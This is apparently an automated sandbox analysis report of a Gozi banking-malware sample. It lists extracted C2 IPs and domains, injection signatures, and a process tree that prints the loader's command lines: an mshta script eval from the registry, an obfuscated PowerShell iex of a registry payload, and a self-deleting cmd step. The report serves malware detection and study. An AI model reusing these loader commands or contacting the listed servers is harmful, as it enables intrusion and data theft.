Analysis
-
max time kernel
152s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
04-10-2023 18:43
Static task
static1
Behavioral task
behavioral1
Sample
ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6_JC.exe
Resource
win7-20230831-en
General
-
Target
ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6_JC.exe
-
Size
296KB
-
MD5
f5830dc3fe80761eb82a0754b1697e6b
-
SHA1
9f25e979cb2de3857278645b60c4afa37d0e6702
-
SHA256
ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6
-
SHA512
8fc4bf848205a3d28dc457e0e09f0831336be36a0824e93818a85207a8a8a63597815918f53dd472cf99ec1f08f8a2aa7cb1a5b43cf7c9782de69899620298fa
-
SSDEEP
3072:YaL9FpSv0N0aIlzHMyXxpJD4xXvw1h+XKwY1a/I6RMxY:tpF0vW0aIlf+/w1hIr2aI6G
Malware Config
Extracted
gozi
Extracted
gozi
5050
185.247.184.139
62.72.33.155
incontroler.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
mifrutty.com
systemcheck.top
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 3288 set thread context of 2624 3288 powershell.exe Explorer.EXE PID 2624 set thread context of 3736 2624 Explorer.EXE RuntimeBroker.exe PID 2624 set thread context of 3220 2624 Explorer.EXE RuntimeBroker.exe PID 2624 set thread context of 4952 2624 Explorer.EXE RuntimeBroker.exe PID 2624 set thread context of 2880 2624 Explorer.EXE cmd.exe PID 2880 set thread context of 3664 2880 cmd.exe PING.EXE PID 2624 set thread context of 4240 2624 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3916 1172 WerFault.exe ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6_JC.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 3664 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6_JC.exepowershell.exeExplorer.EXEpid process 1172 ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6_JC.exe 1172 ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6_JC.exe 3288 powershell.exe 3288 powershell.exe 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 3288 powershell.exe 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2624 Explorer.EXE 2880 cmd.exe 2624 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 3288 powershell.exe Token: SeShutdownPrivilege 2624 Explorer.EXE Token: SeCreatePagefilePrivilege 2624 Explorer.EXE Token: SeShutdownPrivilege 2624 Explorer.EXE Token: SeCreatePagefilePrivilege 2624 Explorer.EXE Token: SeShutdownPrivilege 2624 Explorer.EXE Token: SeCreatePagefilePrivilege 2624 Explorer.EXE Token: SeShutdownPrivilege 2624 Explorer.EXE Token: SeCreatePagefilePrivilege 2624 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 2624 Explorer.EXE -
Suspicious use of WriteProcessMemory 42 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 4464 wrote to memory of 3288 4464 mshta.exe powershell.exe PID 4464 wrote to memory of 3288 4464 mshta.exe powershell.exe PID 3288 wrote to memory of 4112 3288 powershell.exe csc.exe PID 3288 wrote to memory of 4112 3288 powershell.exe csc.exe PID 4112 wrote to memory of 4816 4112 csc.exe cvtres.exe PID 4112 wrote to memory of 4816 4112 csc.exe cvtres.exe PID 3288 wrote to memory of 1144 3288 powershell.exe csc.exe PID 3288 wrote to memory of 1144 3288 powershell.exe csc.exe PID 1144 wrote to memory of 2308 1144 csc.exe cvtres.exe PID 1144 wrote to memory of 2308 1144 csc.exe cvtres.exe PID 3288 wrote to memory of 2624 3288 powershell.exe Explorer.EXE PID 3288 wrote to memory of 2624 3288 powershell.exe Explorer.EXE PID 3288 wrote to memory of 2624 3288 powershell.exe Explorer.EXE PID 3288 wrote to memory of 2624 3288 powershell.exe Explorer.EXE PID 2624 wrote to memory of 3736 2624 Explorer.EXE RuntimeBroker.exe PID 2624 wrote to memory of 3736 2624 Explorer.EXE RuntimeBroker.exe PID 2624 wrote to memory of 3736 2624 Explorer.EXE RuntimeBroker.exe PID 2624 wrote to memory of 3736 2624 Explorer.EXE RuntimeBroker.exe PID 2624 wrote to memory of 3220 2624 Explorer.EXE RuntimeBroker.exe PID 2624 wrote to memory of 3220 2624 Explorer.EXE RuntimeBroker.exe PID 2624 wrote to memory of 3220 2624 Explorer.EXE RuntimeBroker.exe PID 2624 wrote to memory of 3220 2624 Explorer.EXE RuntimeBroker.exe PID 2624 wrote to memory of 4952 2624 Explorer.EXE RuntimeBroker.exe PID 2624 wrote to memory of 4952 2624 Explorer.EXE RuntimeBroker.exe PID 2624 wrote to memory of 4952 2624 Explorer.EXE RuntimeBroker.exe PID 2624 wrote to memory of 4952 2624 Explorer.EXE RuntimeBroker.exe PID 2624 wrote to memory of 2880 2624 Explorer.EXE cmd.exe PID 2624 wrote to memory of 2880 2624 Explorer.EXE cmd.exe PID 2624 wrote to memory of 2880 2624 Explorer.EXE cmd.exe PID 2624 wrote to memory of 2880 2624 Explorer.EXE cmd.exe PID 2624 wrote to memory of 2880 2624 Explorer.EXE cmd.exe PID 2880 wrote to memory of 3664 2880 cmd.exe PING.EXE PID 2880 wrote to memory of 3664 2880 cmd.exe PING.EXE PID 2880 wrote to memory of 3664 2880 cmd.exe PING.EXE PID 2880 wrote to memory of 3664 2880 cmd.exe PING.EXE PID 2880 wrote to memory of 3664 2880 cmd.exe PING.EXE PID 2624 wrote to memory of 4240 2624 Explorer.EXE cmd.exe PID 2624 wrote to memory of 4240 2624 Explorer.EXE cmd.exe PID 2624 wrote to memory of 4240 2624 Explorer.EXE cmd.exe PID 2624 wrote to memory of 4240 2624 Explorer.EXE cmd.exe PID 2624 wrote to memory of 4240 2624 Explorer.EXE cmd.exe PID 2624 wrote to memory of 4240 2624 Explorer.EXE cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3736
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4952
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3220
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Users\Admin\AppData\Local\Temp\ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6_JC.exe"C:\Users\Admin\AppData\Local\Temp\ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6_JC.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1172 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 4763⤵
- Program crash
PID:3916 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Hube='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hube).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\DD164BDA-982A-17AD-8A61-4C3B5E25409F\\\FolderOptions'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name mauqywmmp -value gp; new-alias -name kjdlgojlw -value iex; kjdlgojlw ([System.Text.Encoding]::ASCII.GetString((mauqywmmp "HKCU:Software\AppDataLow\Software\Microsoft\DD164BDA-982A-17AD-8A61-4C3B5E25409F").MelodyTool))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5xjfxkub\5xjfxkub.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B43.tmp" "c:\Users\Admin\AppData\Local\Temp\5xjfxkub\CSCF62E497D1AB942F1A13D8BAFF9F6B5A.TMP"5⤵PID:4816
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ciphxhqy\ciphxhqy.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C9B.tmp" "c:\Users\Admin\AppData\Local\Temp\ciphxhqy\CSC644848F6DCC8401D86E9C61B92F7617.TMP"5⤵PID:2308
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\ddce7321ecf07394badc64ef8b5fc6000b56c517f7ed6dc1506e4c6c8b4b29a6_JC.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3664 -
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:4240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1172 -ip 11721⤵PID:3380
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD555aa44f5b2eab798ebbe905460853e0c
SHA13c2112d3209f5025e20d39892bf2f5a8e068eae9
SHA256e171049cccf99f96449b4267914794bceb4ac721b4d06dc1b5fbffb3d5d5798d
SHA512bb40831878f6d17ceb9b179299ed7447a3d47e3140ebcb8c68c319c690c128363ad59092de16ea839c5543a4bd1b70874c4bb22179a350d39d92d5aefee91ac4
-
Filesize
1KB
MD5d7ace75fcc0361c636b8e5b61b355d01
SHA1da35147d575f435f3f52dcf8c97461f9909e845c
SHA2563a26a4db9cfea1e2557cc8e80cfbfbcd8a990d6b96dba728bbc0d7e26ebfd02b
SHA51256099e23224182e072d2d66bfc30eb988a9b4da6577df457ada7f06c87eb7fa592f1b7f8fd77c033e2335e2b59682a0b75da560e6f20f7fa278c353c6a8c5dc2
-
Filesize
1KB
MD50b5e1b8e7bf54cd528dfd277217f7654
SHA15963e0cfbe419c13ceb41ef233ee10f6ba839db4
SHA2560f18cd6e871aaa8823ec0051d94e75c160810281a555d630343f42061bb75dd2
SHA51262407e330eba59a853c45bceeb5d26763ffa9cacd6b370771e91903fd1dee8868d32736a46e267f91b9b246894a594239e0f7b9006a256763f538ad6814a5be9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD59f6f6fadf8447dcd523594b09ef4b5f0
SHA11e98c74a2245728bd4c793deb39c8f137d36cfbf
SHA2567d3f98e8e53593a255bd6d5b12442f27093067f44ebebb23f2fe3b270bbba610
SHA512b3b81cccfc1d57a56f71b55361f0e83b37d98a8957037271f516923f2c2415183774d785794224511bf10271afe11c18790e6703d5ef231a966b44c9ac00afe7
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
369B
MD565dfc19c189c076766b6ba0391130653
SHA1c7519b6194c9a1751681e958cc709f666230eb4f
SHA2562c7a88afc502f7c48eaa9822e1db1e6d3f1c9492975db3d02c5c90911d0d4b6a
SHA512248dff09ea184f702a660b96b2836ebe5b0b1361f91ce115389852747ecd95867f315d8d82dcf209f3bb74464ea7e7d71388cec3268cc20debd98840d19ae74a
-
Filesize
652B
MD5826d84c6fb73ff13d985b9ef6cc15520
SHA1360fd22943e881447280ac29b3e5d2d4a4606f07
SHA2565c90e75373789a44080e5d93ba03925f8c9cddc6310e21ffa6c608ecbf802b2a
SHA512432f4ccf0da90127e1ff3cc98cccf2ed420fb244c9b6eed2c5624631905d559b5115d92eb3114b298493cf04857c1fb35c6c1c7506a329372f3a41759311e395
-
Filesize
652B
MD57d0a16eb36139e3e0247ae3d6e45b552
SHA1751db8991f25c476f5f5c1a9a12706423dfe1935
SHA25627796c590ecaae03fa121966e0a9f51cac6fcea4718f1de1c9beb4de191be253
SHA512e91370fe26d660ebe65a1f567e1bf7d6d85365033918ef837d791daef973784fefb4b723c5b332d14e3db2e34790ee6859710cac39bab61b9a66166229d57fe8
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
369B
MD5a276342bd898f6fdaeb6c5ee2e6fdf13
SHA1d3dcc7ef33a3ab6281afcbc52d08cd269ee97c1d
SHA256753375a6974e59a40cbaa9210206addab03e390b53fda9dc81256cda0ead039a
SHA512f7e9ff674c7965d12e3dcafe1eccbdd2fb1a94e4595066a6c52a44fb8f9db5244de1e127a67e226a2937e6f53d9e3912f82d5d9dd762530c2819ef106b90faf5